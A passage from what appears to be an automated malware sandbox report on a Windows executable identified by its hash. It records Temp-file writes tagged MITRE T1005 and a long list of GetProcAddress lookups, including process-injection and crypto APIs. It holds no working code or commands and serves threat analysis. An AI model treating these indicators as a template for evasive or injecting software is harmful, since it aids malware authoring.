directory", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\733c94c5\\4f98.tmp\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\733c94c5\\cebb.tmp\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpBDC4.bmp\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter midimap.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter memmove (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter isspace (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter tolower (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter _aulldvrm (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter memset (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter memcpy (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NtQueryVirtualMemory (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptGetKeyParam (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CoGetMalloc (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSGetPropertyFromPropertyStorage (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PropVariantClear (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PropVariantToBSTR (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadStr (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadStrAlloc (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBOOL (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSGetPropertyDescription (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSEnumeratePropertyDescriptions (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PSCreateMemoryPropertyStore (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PropVariantToInt32 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PropVariantToVariant (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RtlDllShutdownInProgress (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetWindowInfo (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetAncestor (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesA (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ExtTextOutW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter WICCreateImagingFactory_Proxy (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CreateStreamOnHGlobal (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ?New@BasePrivate@@YAPAXI_N@Z (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ?Initialize@Base@@YGXXZ (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter ?Delete@BasePrivate@@YAXPAX@Z (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CoCreateFreeThreadedMarshaler (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SetupDiCreateDeviceInfoList (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CMP_RegisterNotification (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CM_MapCrToWin32Err (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SetupDiGetClassDevsExW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter SetupDiEnumDeviceInfo (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter AddMandatoryAce (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter InterlockedCompareExchange (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter DriverProc (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter modMessage (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter midMessage (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter CMP_UnregisterNotification (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetCaps (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetUser (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPAddConnection (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPAddConnection3 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetReconnectFlags (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPCancelConnection (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetConnection (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetConnection3 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetUniversalName (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPOpenEnum (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPEnumResource (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPCloseEnum (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetResourceParent (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetResourceInformation (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPGetConnectionPerformance (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetProcAddress\" with a parameter NPFormatNetworkName (UID: 00000000-00003064)\n 